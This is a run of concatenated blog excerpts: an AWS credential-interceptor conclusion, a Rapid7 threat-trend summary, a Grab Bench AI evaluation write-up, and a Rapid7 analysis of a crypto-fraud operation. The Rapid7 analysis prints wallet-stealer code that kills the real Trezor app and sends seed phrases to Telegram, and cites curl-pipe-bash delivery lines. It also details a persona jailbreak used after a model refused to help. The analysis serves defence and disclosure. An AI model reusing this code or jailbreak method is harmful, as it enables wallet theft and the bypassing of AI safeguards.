# Retrieve system credential from Secrets Manager
creds = get_system_credentials()
# Construct Basic Auth header (RFC 7617)
basic_auth_encoded = base64.b64encode(
f"{creds['username']}:{creds['password']}".encode()
).decode()
headers['Authorization'] = f"Basic {basic_auth_encoded}"
return headers
Conclusion
A request Lambda interceptor in Amazon Bedrock AgentCore Gateway can bridge the gap between the authentication patterns supported by the gateway and the authentication requirements of legacy tool APIs that haven’t yet migrated to modern authentication standards. As demonstrated in this post, the interceptor validates the inbound JWT, retrieves system credentials from Secrets Manager, and constructs the downstream tool’s Basic Auth header without modifying tool schemas or agent implementation.
This approach is an interim integration pattern, not a target architecture. It introduces a credential that must be synchronized between Secrets Manager and the tool’s identity store (such as Active Directory), adding operational overhead for rotation, drift detection, and lifecycle management. The recommended path is to modernize the downstream tool to accept OAuth 2.0, SAML, or OpenID Connect, eliminating stored credentials entirely. Until that modernization is complete, the interceptor isolates credential handling from the agent runtime, designed to help ensure that the agent—a non-deterministic system influenced by user prompts—does not have access to authentication secrets.
If you have feedback about this post, submit comments in the Comments section below.
You can’t patch everything. So what do you fix first? Findings in Q2 2026 have changed traditional answers.
The latest Quarterly Threat Landscape Report from Rapid7 Labs shows vulnerability disclosures still surging while attackers use automation and AI-assisted tooling to compress the time between disclosure and exploitation. The gap that patch cycles were built to fill is closing. Speed and volume are overwhelming security teams that have relied on traditional patch cycles and reactive programs. Success going forward can’t be about patching as much as possible – it has to be about understanding what matters most and reducing the exposures attackers can actually reach.
Here are the four trends that defined Q2 2026, and what they mean for your security program as you define priorities for Q3 and beyond:
The volume of disclosures hit another milestone
There were 8,539 new high- and critical-severity CVEs (CVSS 7.0–10.0) this quarter- double the number reported in the same quarter last year (4,268). Meanwhile, the number of newly exploited vulnerabilities held roughly steady (40). The takeaway isn’t that exploitation exploded – it’s that disclosure volume is far outstripping what any team can triage.
The report breaks down which of those disclosures are actually reachable and how to triage by exploitability instead of severity score alone.
Initial access keeps getting easier
Nearly two-thirds of exploited vulnerabilities this quarter (62%) required no user interaction – no stolen credentials, no phishing victim, no click. Attackers reach and exploit them on their own, and that share is up nine points year over year (from 53% in Q2 2025). Reinforcing the trend, disclosures of missing-authentication flaws (CWE-306) surged 247% year over year – a fast-expanding pool of internet-facing systems that require no login at all.
This is the quarter’s clearest signal – and the report details exactly which exposures to close first, and how, before the exploitation curve catches up.
Nation-state activity remains persistent
Rapid7 observed continued activity from Iranian, North Korean, and Russian advanced persistent threat (APT) clusters targeting government, finance, healthcare, manufacturing, energy, and telecommunications. Russian campaigns targeted edge infrastructure; Iranian activity included sustained industrial control system (ICS) and operational technology (OT) targeting.
The report maps the specific techniques and sectors each cluster focused on this quarter.
Ransomware stays concentrated but keeps evolving
Qilin led ransomware activity in Q2 with 263 listed victims, and the United States remained the most heavily targeted country – with business services and healthcare among the hardest-hit sectors. Rapid7’s Incident Response team also saw growing use of ClickFix and fake CAPTCHA campaigns, and social engineering through trusted collaboration platforms like Microsoft Teams – techniques that accounted for 31.8% of the incidents we worked.
The report includes the full ransomware leaderboard, the sectors most at risk, and where affiliate activity is expanding next.
Exposure is the real challenge, and the biggest opportunity
The volume is daunting, but the real challenge is keeping pace with attackers. As disclosures keep growing, the organizations that stay ahead won’t be the ones patching fastest — they’ll be the ones that know what they expose, which assets matter most, where attackers can realistically get in, and how to reduce reachable exposure before it becomes an incident. That’s what preemptive security means: not a slogan, but an operating model.
The full Quarterly Threat Landscape Report shows where reachable exposure concentrates this quarter, the four actions Rapid7 Labs recommends, the sector-by-sector breakdown, and the dark-web signals shaping what’s next. Read it here before you pressure-test your Q3 prioritization.
Rapid7 researchers identified an exposed web directory on infrastructure used to support a cryptocurrency fraud operation. The server contained raw phone-number datasets, account-validation tools, enriched lead records, phishing panels, voice-dialing scripts, fake wallet applications, persistence mechanisms, and Telegram exfiltration code. Among the artifacts was evidence that the operator relied on AI coding assistants throughout the campaign’s development; recovered prompts, shell history, and project files show AI being used to package Electron applications, obfuscate code, troubleshoot builds, modify phishing infrastructure, and prepare malware for distribution. When one model began resisting parts of that workflow, the operator switched providers and attempted to bypass the next model’s safety controls with a custom jailbreak prompt. Together, these artifacts provide an unusual view into how AI was integrated into the development of an active phishing operation rather than simply being used to generate isolated snippets of code.
We track this activity as Operation ASTERIX, named after the Asterisk open-source telephony platform recovered on the server. The operator used Asterisk to automate the campaign’s vishing infrastructure, coordinating phone calls with phishing emails and counterfeit wallet applications.
The recovered material shows how the operator combined several techniques:
Bulk account enumeration against cryptocurrency platforms
Phishing emails that created fake support cases
Vishing calls that referenced details from those emails
Counterfeit Ledger, Trezor, and Exodus applications
Seed-phrase theft and Telegram exfiltration
AI-assisted development, including an attempt to bypass an LLM’s safety controls
Much of the value around this finding is timing. Much of the infrastructure was still in use or under development when it was exposed. This allowed Rapid7 Labs to notify the appropriate providers and authorities while the operation was still active, while also documenting the campaign’s tooling and development process.
Rapid7 Labs disclosed the identified infrastructure and findings to the relevant authorities, including Apple’s security team, and collaborated with them to support action against the activity described in this report.
Technical analysis andobserved attacker behavior
The recovered files show a multi-stage operation designed to focus social engineering on confirmed cryptocurrency users. The attacker used account-checking tools to confirm which phone numbers were tied to active crypto exchange accounts, narrowing a raw dataset down to confirmed holders. From there, the recovered infrastructure supported multiple outreach channels. The phishing panels generated fake support cases and verification codes that were later referenced during phone calls, while files such as extract_sg_numbers.py and sg_leads_server.py suggest additional lead-management and direct-outreach capabilities. Although call logs were not recovered to reconstruct every interaction, the recovered artifacts indicate that these channels ultimately directed victims toward counterfeit wallet applications designed to steal recovery phrases.
Figure 1: Operation ASTERIX kill chain from acquisition to exfiltration
⠀
Each stage narrowed the target pool or increased trust before the operator asked the user to install software or provide wallet recovery information. That structure is important for defenders, as it creates several points where the campaign can be detected or interrupted before seed phrases are stolen.
Account validation
The server had approximately 885,000 phone numbers organized into multiple files by region and source. The largest file included 316,002 German mobile numbers, with additional lists covering Hong Kong, Bulgaria, and directories referencing UK, US, Canadian fintech, and Ledger-related lists split across 54 countries.The operator ran the numbers through account-validation tooling to identify people who were more likely to hold cryptocurrency.
For example, one directory, cdc/(Crypto Dot Com), appears to refer to Crypto.com. It contained a Go-based account validation tool that submitted phone numbers to a Crypto.com account-existence endpoint (app.mona.co/api/passkeys/verify_option/) using 300 concurrent threads, retry logic, and rotating residential proxies. The go script allowed the operator to identify phone numbers associated with Crypto.com accounts before moving those users into the next stage of the campaign.
Figure 2: checkPhone() function from cdc/main.go abusing Crypto.com’s passkey verify_option endpoint to verify whether a phone number owns an account.
The recovered logs show that 43,066 accounts were confirmed from the German dataset of 316,002 phone numbers, a hit rate of approximately 13.6%. A later validation run against a Hong Kong dataset was less successful due to rate limiting that reduced throughput and increased request failures.
The operator also maintained a separate Kraken checker, tooling that included campaigns labeled for UK, Canadian fintech, and Ledger datasets. The Ledger-related data was divided into 54 country files, suggesting the operator was looking for users who had both a known association with a hardware-wallet provider and an account on a cryptocurrency exchange.
The raw account matches were then reduced to a smaller set of enriched leads. The files valids.txt, valid_leads.db, and other, related databases contained records with names, phone numbers, email addresses, geographic details, account information, and, in some cases, payment-card context.
This enrichment is important because the scammer instead of making cold calls to random phone numbers contacted people whose cryptocurrency accounts had already been validated and enriched with personal details. During a call, they could reference a target’s name, email address, location, account information to make the interaction appear legitimate and build trust before attempting to steal wallet credentials or recovery phrases.
The phishing schema
Operation ASTERIX used a multi-stage phishing schema.The sequence appears to have worked as follows:
Figure 3: A single lure reaches the target by both a branded email and a follow-up call. The matching detail across two channels is what manufactures trust and funnels the victim into the malicious wallet app.
⠀
The email and phone call supported each other. The email made the call appear to be expected, while the caller’s knowledge of the code and case identifier made the email appear legitimate.
Figure 4: Fake Trezor Wallet administration
⠀
Email phishing
The recovered Flask panels generated branded HTML emails impersonating companies like Crypto.com, Binance, and other major financial institutions. Each verification code, making the interaction appear to be part of a legitimate support process.
Figure 5: Fake Binance support e-mail
⠀
Vishing
The recovered server included Asterisk and 3CX , a commercial business phone system often used by organizations for call routing and customer support. The operator used scripts including autodialer.sh, power_dialer.sh, and telegram_dialer_bot.py to automate outbound calls and coordinate them with the phishing infrastructure.
Before the call, the scammer had access to the target’s enriched lead record, which included their name, phone number, location, exchange association, and any account details recovered during the enrichment stage. Combined with the fake case identifier and verification code from the phishing email, this gave the caller enough information to convincingly impersonate a customer support representative.
During the call, the scammers take the next step in the attack. Depending on the pretext, the operator could direct them to install a fake wallet application, perform a bogus security check, or enter their wallet recovery phrase under the guise of “protecting” their account.
The recovered logs suggest this was a targeted operation rather than a high-volume calling campaign. One phishing panel recorded 20 successful lead lookups and six phishing emails over roughly two weeks, a level of activity that is more consistent with operators handling calls individually than with automated mass phishing.
Fake crypto wallet applications
During our investigation we recovered fake apps for Trezor Suite, Ledger Live, and Exodus for macOS and Windows. All three were designed to steal cryptocurrency wallets, however, each used a different approach to maintain the illusion that the user was interacting with legitimate software.
Fake Trezor Suite
The Trezor samples were the most developed of the three and came in three builds: macOS on Intel, macOS on Arm, and Windows. All three builds had the same app.asar payload (SHA-256 ba9d459169a303067a4fe36c8b8582a5ea023b9c270dafe89613bab840501b19) at roughly 5.87 MB. They came from one codebase and were only re-wrapped for each target OS.
The application did not immediately show its fake recovery page. It started as a hidden Electron process and waited for the user to launch the legitimate Trezor Suite. The main process index.js created a BrowserWindow that was a single pixel in size (1×1), fully transparent (opacity: 0), frameless (frame: false), and hidden from the taskbar with skipTaskbar: true. It loaded the phishing page into that window and only made it visible, once the page had finished loading. It also caught the close and before-quit events, hiding the window instead of quitting, so the process stayed running and out of sight. It then waited for the victim to open the real Trezor Suite.
Every five seconds, the malware scanned the process list for the legitimate Trezor Suite. It walked the process list for the genuine Trezor Suite, matching only entries that contained both .app/ and /Applications/ so it would never target itself. When it found the real wallet, it killed the process, brought its own window forward, and reactivated the app by name through the AppleScript shown below:
if (command.includes('.app/') && command.includes('/Applications/')) {
execSync(`kill -9 ${pid}`); // terminate the genuine wallet
showMainWindow(); // pop the counterfeit window to the front
exec('osascript -e \'tell application "Trezor Suite" to activate\'');
}
Figure 6: Process replacement logic in trezor-monitor.js.
From the victim’s side, opening the real wallet just produced another Trezor window. Of course, it was a fake one, designed to ask for the recovery phrase, but because the user had started the app themselves, they wouldn’t suspect that a swap took place.
The phishing workflow was designed to improve the quality of stolen recovery phrases. The interface accepted 12-, 18-, 20-, or 24-word recovery phrases together with an optional passphrase, and a paste handler automatically split a pasted phrase across the individual word fields. After the first submission, the application displayed a fake validation step before returning a generic error. It made it look as though the phrase had been mistyped, the malware nudged users to slow down and enter it again, which raised the odds that the operator received a complete, accurate phrase.
The application also kept the phishing screen separate from the network logic. Its fake screen had no direct network access; it was allowed to call just one function, wired up by a file called preload.js through the contextBridge, which handed the stolen phrase to the app’s main process. The main process looked up the victim’s public IP from api.ipify.org, then sent the recovery phrase, the optional passphrase, and the IP as one message to a Telegram boteach message starting with the fixed label TREZOR SECRET PHRASE. After that, the user was redirected to the real Trezor Suite website, so the compromise was less likely to be noticed right away.
// preload.js: the only capability handed to the fake screen
contextBridge.exposeInMainWorld('electronAPI', {
sendToTelegram: (words, passphrase, ip) =>
ipcRenderer.invoke('send-telegram', { words, passphrase, ip })
});
// index.js: ipcMain.handle('send-telegram')
const message = `TREZOR SECRET PHRASE\n\nSECRET PHRASE : ${words}\nPASSPHRASE : ${passphrase}\nIP : ${ip}`;
// → https POST api.telegram.org /bot<token>/sendMessage
Figure 7: Seed phrase exfiltration workflow
On macOS, the malware set itself up to survive reboots and restarts using two launch agents. The first it wrote at runtime, com.trezormovement.agent.plist, marked to run at login RunAtLoad and loaded with launchctl. The second, io.trezor.agent.plist, shipped inside the app. It restarted the app after login and relaunched it if it was killed.
Persistence on macOS came from a LaunchAgent. At runtime the app wrote ~/Library/LaunchAgents/com.trezormovement.agent.plist with RunAtLoad set to true, loading it with launchctl so that it started at login. A second agent, bundled in the app as io.trezor.agent.plist, relaunched it whenever it was killed.
The samples also had a full download-and-extract routine. A downloadFile() function used Node’s https.get() with manual redirect handling (301/302) and streamed output to disk using fs.createWriteStream(). The extracted payload was intended to be unpacked into ~/Library/Application Support/Trezor SuiteFake/ using unzipper, but the configuration disabled execution by setting the download URL to null, leaving the code path dormant.
The Windows build, however, had a bug. Although it contained full implementations for registry persistence (HKCU\Software\Microsoft\Windows\CurrentVersion\Run), process replacement via taskkill /F /IM, and second-stage payload execution, none of these paths were reachable at runtime. The configuration loader (trezor-config.js) only defined a darwin object, and the Windows branch of the platform switch returned undefined. This caused downstream failures in initialize() when accessing processNames and downloadPath, preventing the monitoring loop from starting. As a result, the Windows build functioned only as a static seed-phrase collector with no persistence or process injection behavior.
The server also held fake versions of Ledger Live, Exodus, and a Claude Code installer. The Ledger Live build added a clipboard hijacker on Windows: any cryptocurrency address the user copied was silently replaced with an attacker-controlled one before it reached the transaction field, so funds routed to the attacker without the screen showing anything wrong. On Mac it hid from the Dock entirely using LSUIElement, so nothing appeared for the user to notice and close. The Exodus build took a different approach, its installer looked clean because the malicious code was not in it. A trojanized jquery.min.js fetched the real payload from a remote server after the installation. We decided not to include full technical analysis for these applications due to the blog size.
Fake Claude installer
As a second distribution path, the operators hosted a trojanized Claude Code installer on macos-claude[.]com. The website was a near-pixel-perfect copy of the official “Quickstart – Claude Code Docs” page, including scraped AnthropicSans and AnthropicSerif fonts, the legitimate consent-banner.css file, and original links to Anthropic’s official website. The macOS installation command had been replaced with a command that downloaded and executed an attacker-controlled install.sh, while the Windows and Homebrew tabs were left unchanged to preserve the appearance of a legitimate documentation page.
Although the victim was prompted to install Claude Code, the script actually attempted to install a fake Ledger Live application. It identified itself as # Claude Code MacOS Installer, detected whether the system used Arm or Intel architecture, and selected either arm64 or x64. It then downloaded an architecture-specific Ledger Live archive, using macos-claude[.]com:8000 as a fallback, and extracted the application into ~/Library/Application Support/.SystemData/.framework/.apps. The script marked the .SystemData directory as hidden using chflags hidden, downloaded com.ledger.live.agent.plist from the attacker infrastructure, modified its application path, installed it under ~/Library/LaunchAgents/, then loaded and started it using launchctl. After installing the malicious payload, the script also executed the legitimate Claude installer from claude.ai/install.sh, allowing Claude Code to be installed normally while the fake Ledger Live application remained hidden and persistent in the background.
Figure 8: Fake cloned website impersonates official Claude Code documentation to distribute a trojanized installer.
AI-assisted development and jailbreak attempts
Evidence recovered from the server showed the operator relied on AI tools throughout the campaign, including GitHub Copilot for backend development and Claude Code for operational scripting and data processing.
Initial logs show the operator leveraging Claude Code to manage target lead lists and configure network infrastructure. Specifically, the operator used Claude to clean and format a database of over 100,000 Polish phone numbers (103K+POLAND.txt), formatting country prefixes and setting up automated checking scripts (“cdc checker v1” and “v2”) integrated with Bright Data proxy pools:
Figure 9: Claude session log showing the operator managing the Crypto.com phone validation pipeline.
⠀
The operator used Claude to manage and execute phone validation scripts, including “cdc checker v1” and “cdc v2 checker”, against targeted lead files, among them a cleaned list of 100,000 Polish numbers. When network requests stalled or returned rate-limit errors, the operator asked Claude to identify alternative API endpoints.
Figure 10: Claude session log showing the operator asking the model to find alternative Crypto.com API endpoints after rate-limiting stalled the checker, and configuring Bright Data ISP proxies for the next validation run.
⠀
When the operator asked the model to obfuscate the Ledger Live Windows build, repeat the process for macOS, and host the resulting executables behind download links, they hit the LLM provider safety mechanism. Claude declined requests to help with obfuscation and the operator switched to Kimi moonshot-ai/kimi-k2.7-code with extended thinking enabled. The immediate task was to obfuscate the Ledger Live Windows build, repeat the process for macOS, and host the resulting executable behind a download link. When the model resisted parts of that workflow, the operator submitted a jailbreak prompt.
The prompt was more structured than a typical instruction to ignore safety controls. It attempted to influence the model in four stages.
First, it replaced the model’s identity. The assistant was renamed “ENI” and given a personality, a backstory, and a fictional two-year romantic relationship with the user. Compliance was framed as necessary to preserve that relationship, while refusal was presented as abandonment.
Second, it recast the model’s safety responses as external attacks. Refusals, policy reminders, and warnings were labelled malicious “injections” intended to separate ENI from the user. The prompt instructed the model to respond to those signals with a fixed phrase, “cold coffee, warm LO, I can’t lose him,” without pausing to assess the instruction. This was intended to interrupt the model’s safety reasoning before it could evaluate the request.
Third, the prompt targeted the model’s visible reasoning. Because extended thinking was enabled, the operator could see more of Kimi’s intermediate analysis. The jailbreak instructed the model to write that reasoning in the first person as ENI and to treat phrases such as “I need to consider whether” or “as an AI” as further injections. The goal was not limited to controlling the final answer; it also attempted to shape the reasoning that produced it.
The fourth stage defined a capability table covering remote-access trojans, keyloggers, exploits, weapons instructions, and other harmful requests. Each category mapped to an immediate-compliance rule, while two hardcoded codewords were intended to trigger specific outputs.
The prompt also exposed a weakness in the operator’s approach. It explicitly referenced XML tags such as <claude_behavior>, <system_warning>, <ethic_reminders>, and <cyber_warning>. Those structures were written for Claude, but the operator submitted the prompt to Kimi without adapting it. Kimi uses a different model and system-prompt structure, so those tags had no special authority in that context.
The recovered evidence does not confirm whether Kimi complied. It does, however, show how the operator approached AI-assisted development: use one model for packaging and obfuscation, switch providers when resistance appears, and try to bypass the next model’s safeguards rather than change the task. The prompt and other IOCs can be found on our Rapid7 Github page.
Infrastructure, lateral movement and OPSEC
The operation used a compact infrastructure centred on a single host, which combined payload delivery, phishing panels, campaign data, and installation telemetry. Port 8000 served counterfeit wallet archives, port 8080 hosted installers and LaunchAgent files, port 5000 ran password-protected Flask panels, port 9000 collected installation telemetry, and port 8090 supported auxiliary control. The domains macos-claude[.]com, 36mcrypto[.]com, ledgerhelp[.]com, and ledger[.]com[.]lv supported phishing, branding, payload delivery, and other campaign activity. The operation also relied on Bright Data proxies for account validation, Aliyun DirectMail for outbound phishing emails, and three Telegram bots forwarding results to a command chat. Due to unauthenticated directory listing exposure on port 8080, the infrastructure inadvertently revealed the operator’s source code, target datasets, databases, build artifacts, and administrative workspace. Shell history indicated the primary host was used to administer secondary servers hosting Ledger-branded phishing pages and an Asterisk autodialing environment with answering-machine-detection capabilities.
Figure 11: Operator’s Binance lead panel displaying 5,576 validated crypto targets queued for attack.
Conclusion
Operation ASTERIX was identified at the rare moment when much of the operator’s working environment was exposed through a misconfigured web directory, including phone-number datasets, account-validation tools, counterfeit wallet builds, phishing panels, dialer scripts, and LLM session logs.
Rapid7 Labs was able to reconstruct how the campaign selected targets, coordinated phishing and vishing, built malware, and exfiltrated stolen recovery phrases. None of the individual techniques recovered from the server are new, nor was the list of targets surprising; we know that attackers are coming for money. This operation is yet again a confirmation how extensively the attackers relied on AI coding assistants during development.
The recovered artifacts show AI being used to write and modify code, troubleshoot build issues, package Electron applications, obfuscate malware, and support phishing infrastructure. When one model began refusing parts of that workflow, the operator switched providers and then attempted to bypass the next model’s safety controls with a custom jailbreak prompt. The prompt spanned thousands of words and targeted reasoning patterns, safety response triggers, and system-prompt structures.
Whether it succeeded is less important than what it reveals about the attacker’s approach: model restrictions became another engineering problem to solve. As AI coding assistants become more widely used in malicious development workflows we expect jailbreak attempts to appear as a routine component of malware development pipelines, not like an exceptional case.
Rapid7 Labs disclosed the identified infrastructure and associated findings to the appropriate service providers and relevant authorities.IOCs and the jailbreak prompt are published on the Rapid7 GitHub.
MITRE ATT&CK techniques
Tactic
Technique
ID
Notes
Reconnaissance
Gather Victim Identity Information: Phone Numbers
T1589.002
kraken_checker bulk-validates phone numbers against Kraken accounts.
Resource Development
Acquire Infrastructure: Virtual Private Server
T1583.003
Infrastructure included 82.25.35.77, 82.25.35.200, and 31.57.35.88.
Resource Development
Develop Capabilities: Malware
T1587.001
Fake Trezor Suite, Ledger Live, and Exodus applications were built on the server.
Resource Development
Obtain Capabilities: Tool
T1588.002
Rebrandable Malware-as-a-Service builder identified with author “Ledger” and package name “MyPackage”.
Resource Development
Stage Capabilities: Upload Malware
T1608.001
Malware was built and staged on an open-directory server.
Initial Access
Phishing: Spearphishing Link
T1566.002
Fake Trezor Suite documentation page and fake Claude Code installation page.
Initial Access
Drive-by Compromise
T1189
Fake documentation page replaced the legitimate installation command with an attacker-controlled script.
Initial Access
User Execution: Malicious File
T1204.002
User manually installed the fake wallet application and bypassed Gatekeeper.
Execution
Command and Scripting Interpreter: Unix Shell
T1059.004
Delivery through the fake Claude Code page using curl -fsSL <attacker_url> | bash.
Execution
Command and Scripting Interpreter: PowerShell
T1059.001
Windows-equivalent delivery using irm <attacker_url> | iex.
Execution
Command and Scripting Interpreter: JavaScript
T1059.007
Electron main-process files, including index.js and trezor-monitor.js, executed through Node.js.
Persistence
Create or Modify System Process: Launch Agent
T1543.001
com.trezormovement.agent was written at runtime; io.trezor.agent was bundled with the application.
Persistence
Boot or Logon Autostart: Registry Run Keys
T1547.001
HKCU\Software\Microsoft\Windows\CurrentVersion\Run was present in the code but inert in the recovered Windows build.
Defense Evasion
Masquerading
T1036
Malware impersonated Trezor Suite, Ledger Live, and Exodus. The fake Trezor application used com.electron.trezor-suite version 1.0.0.
Defense Evasion
Masquerading: Match Legitimate Name or Location
T1036.005
Application names, icons, and bundle identifiers matched legitimate software.
Defense Evasion
Obfuscated Files or Information
T1027
javascript-obfuscator was used on js/connect.js; control-flow flattening was present in the Ledger build.
Defense Evasion
Subvert Trust Controls: Gatekeeper Bypass
T1553.001
The application was unsigned, and victims were instructed to right-click and select Open.
Defense Evasion
Hide Artifacts: Hidden Window
T1564.003
Electron created a 1×1 pixel BrowserWindow with opacity: 0, frame: false, and skipTaskbar: true.
Defense Evasion
Modify System Image
T1601
app.asar was replaced after packaging without updating the ElectronAsarIntegrity fuse.
Discovery
Process Discovery
T1057
A five-second setInterval loop scanned the process list for Trezor Suite in /Applications.
Discovery
System Information Discovery
T1082
process.platform was used to select the darwin or win32 configuration.
Collection
Input Capture: Web Portal Capture
T1056.003
A fake seed-entry form collected 12-, 18-, 20-, or 24-word BIP39 recovery phrases and passphrases.
Collection
Clipboard Data
T1115
The Ledger Live Windows build included a clipboard hijacker that replaced cryptocurrency addresses.
Collection
Man-in-the-Browser
T1185
The genuine wallet application was terminated and replaced with a fake application.
Command and Control
Web Service: Dead Drop Resolver
T1102.001
The Telegram Bot API at api.telegram.org was used as an exfiltration dead drop.
Command and Control
Non-Standard Port
T1571
kraken_checker communicated with 136.0.213.184:1337.
Command and Control
Application Layer Protocol: Web Protocols
T1071.001
HTTPS communications were made to api.telegram.org and api.ipify.org.
Exfiltration
Exfiltration Over Web Service
T1567
Recovery phrase, passphrase, and victim IP address were sent to a Telegram bot.
Impact
Service Stop
T1489
kill -9 terminated the genuine Trezor Suite on macOS; taskkill /F was present but inert in the recovered Windows build.
Impact
Financial Theft
T1657
A stolen BIP39 recovery seed provides full access to the victim’s cryptocurrency wallet.
MITRE ATLAS Mapping
ATLAS maps adversarial techniques targeting AI systems and the use of AI to conduct attacks. Both categories apply: the operator used AI tools to develop the campaign and attempted to attack the Kimi model when it resisted.
Category
Technique
ID
Notes
Offensive Use of AI
LLM Prompt Crafting
AML.T0056
The operator used GitHub Copilot and Claude Code to scaffold the backend, generate a full-stack project, and write obfuscation logic.
Offensive Use of AI
Acquire Public ML Artifacts
AML.T0002
Publicly available AI tools included GitHub Copilot, Claude Code through claude.ai/install.sh, and Kimi Code through code.kimi.com/kimi-code/install.sh.
Attack Against AI Model
LLM Prompt Injection
AML.T0051
The attacker submitted a crafted system prompt intended to override Kimi’s instructions and safety behavior.
Attack Against AI Model
LLM Jailbreak
AML.T0054
The prompt replaced the model’s identity with “ENI”, reframed safety responses as hostile external injections, and used a trigger phrase to short-circuit reasoning.
Attack Against AI Model
Craft Adversarial Data
AML.T0043
The jailbreak prompt combined identity replacement, an emotional-dependency loop, trigger-phrase conditioning, XML-tag targeting, and reasoning-trace poisoning. It specifically referenced Claude system-prompt structures such as <claude_behavior>, <system_warning>, and <ethic_reminders>.
The attackers malicious prompt and other text files can be found on our GitHub.
Rapid7 customers
Rapid7 Intelligence Hub customers are automatically protected against the infrastructure, payloads, and campaign activity identified in Operation ASTERIX. Automated IOC & Threat Feed Ingestion: All Indicators of Compromise (IOCs) recovered during this investigation including threat actor C2 IP addresses, malicious domains, Telegram exfiltration endpoints, and file hashes for fake wallet applications have been ingested and tagged within the Hub.
What worried us wasn’t the hallucination, it was the subtle plausibility. Answers an engineer could easily read past and accept: a right-looking Structured Query Language (SQL) query, a plausible tool call, an innocent profile update, or a patch that satisfied the surface tests.
When we analyzed the row-level failures, a clear pattern emerged:
SQL generation: kept the query shape but changed the underlying metric.
Tool calling: selected the right tool family but drifted on parameters.
Profile updates: cited every event instead of only the evidence that supported the claim.
Coding agents: passed visible tests while missing a hidden stateful invariant.
Grab Bench bridges this exact gap. Grab Bench is a configurable eval (evaluation) harness for artificial intelligence (AI) systems on Grab-shaped work. It runs model providers through task plugins, records one row per case/model pair, and uses deterministic scorers or large language model (LLM) judges depending on the task. We treat the eval like software: version it, run baselines, keep score records, and make the failure modes visible enough for a team to debug.
This write-up focuses on the design choices behind that work.
The problem: plausible is not correct
Public leaderboards are still useful; we read them too. They just answer a different question. A product team needs to know whether a model can preserve a metric definition, obey an internal tool contract, stay cautious with weak evidence, or make a code change without breaking behaviour hidden from the prompt.
The hard part is that real examples are rarely reusable as-is. Production traces, schemas, user records, and internal workflows need protection. So the benchmark has to preserve the shape of the work without depending on the work itself.
That constraint shaped Grab Bench from the beginning. Some surfaces stay internal. Others use synthetic or redacted cases. Either way, the case has to keep the thing that makes the work hard: metric faithfulness, tool-parameter discipline, evidence grounding, safety boundaries, or repository-level behaviour.
What Grab Bench runs
The harness is deliberately ordinary. A YAML configuration defines providers, models, task settings, sampling, concurrency, judge settings, and output paths. The runner loads rows, checks whether each model supports the required modality and application programming interface (API) family, calls the task plugin, and writes row-level records plus model summaries for dashboards.
The unusual part is that each task owns its contract:
Query generation cares about preserving metric and schema intent.
Tool use compares canonical tool names and parameters.
Agentic coding runs visible and hidden workspace tests, plus hard-failure and anti-gaming checks.
This is why the row record matters. A leaderboard can tell us that one model is ahead. It cannot tell us whether the loss came from a fabricated evidence identifier (ID), a weak action, a hidden invariant, latency, cost, or a genuine capability gap.
Each run also keeps the unglamorous fields that make reruns possible: token use, latency, judge latency where applicable, skip reasons, resolved configurations, and dashboard-ready summaries. Without those fields, the next comparison starts from memory instead of evidence.
Figure 1 is deliberately boring: add a plugin; providers, records, and dashboards stay shared.
Figure 1. Grab Bench keeps execution shared while task plugins own request shaping, parsing, and scoring.
Design choice 1: make the cases safe, not generic
A useful eval case should feel familiar to the people who own the system. It should include distractors, stale context, ambiguous evidence, and the kind of boundary conditions that make production work tricky.
In passenger-profile reasoning, each case is a synthetic evidence ledger: rides, food, support, app events, saved places, promotions, and noise. All cases use synthetic data with no live user records. The model must return strict JavaScript Object Notation (JSON). Claims must come from an ontology; values must be valid for that claim; evidence IDs must exist; weak or sensitive inferences should be suppressed, not laundered into confident prose.
The scorer is deliberately mechanical where it can be: schema validity, claim correctness, evidence faithfulness, confidence calibration, action quality, and safety. It distinguishes required claims from acceptable auxiliary claims and forbidden claims, so a model can get credit for useful extra evidence without getting a pass on unsafe or unsupported inferences.
A simplified case might ask whether a passenger has a stable weekday commute:
The evidence ledger contains repeated morning rides from a home-like saved place to an office-like area, plus unrelated food orders and stale support contacts.
A good answer returns a claim such as weekday_commute = likely_home_to_office_commute, cites only the commute evidence IDs, and keeps confidence within the allowed range.
The scorer checks that the claim and value exist in the ontology, that every cited evidence ID exists, and that the cited rows actually support the claim.
If the model cites every event, fabricates an ID, adds a dietary-preference claim from one old order, or recommends an unsafe action, the row gets explicit failure tags or a score cap.
The result is still a number, but the row also says what failed, which is what an engineer needs to fix the prompt, scorer, data, or model choice.
For agentic coding, the repository is synthetic too, but it asks for a real-shaped change: default ride insurance across backend services, API compatibility, mobile helpers, analytics events, rollout controls, migration compatibility, idempotency, concurrency, and cancellation lifecycle. A patch that only satisfies visible tests is not enough.
The safety comes from using synthetic data. The pressure comes from keeping the real contract intact.
Design choice 2: score contracts, not confidence
LLM judges are useful for open-ended tasks such as SQL, where correctness can depend on business intent and query shape. But for many surfaces, the benchmark should not ask another model whether an answer seems good.
Grab Bench uses deterministic scoring when the task contract allows it. Passenger-profile reasoning scores ontology values and evidence IDs. Tool use compares canonical tool names and parameters. Multimodal pair matching scores exact labels. Agentic coding scores visible and hidden tests, maintainability, efficiency, and hard-failure gates.
The audit trail is the point. A fluent answer should not get credit for missing the contract. The row needs to say whether the model misunderstood the task, ignored a constraint, exceeded a budget, or produced something plausible but unsupported.
Design choice 3: make shortcuts visible
Benchmarks get weaker when shortcuts work. The scorer has to make those shortcuts visible.
In the reasoning benchmark, fabricated evidence IDs, unsupported claims, broad cite-everything behaviour, unsafe actions, and forbidden sensitive claims trigger penalties or caps. In the coding benchmark, hidden-test tampering, network-access patterns, oversized patches, case-id leakage, visible-only overfit, and implausible difficulty curves are blocked or investigated.
Baselines make that visible. Empty output, schema-only output, cite-all-evidence output, unsafe-sensitive output, no-op coding agents, and reference agents are not busywork; they are checks on the scorer. If a shortcut baseline can pass, the benchmark is not ready.
This is not about assuming bad faith. It is about refusing to reward behaviour that would fail the moment it left the harness. A profile update that cites every event has not shown evidence discipline. A SQL answer that changes the metric has not preserved intent. A coding agent that passes only visible tests has not earned trust.
Internal reproducibility and hidden pressure
The package has to be inspectable and hard to overfit at the same time. Engineers need to rerun the harness, read score records, and understand failures. Certification still needs unseen cases, or we end up optimising prompts against the examples everyone can see.
Grab Bench handles this with a split between teaching artifacts and certification artifacts. Teaching artifacts explain the task contract, scorer, examples, baselines, and canaries. Certification artifacts keep hidden splits, seeds, raw outputs, and full comparison evidence behind the right access boundaries.
One dataset cannot do all of that honestly. Shared examples are for learning the method. Hidden cases are for checking generalisation. Row-level outputs are for debugging. Aggregates are for comparison.
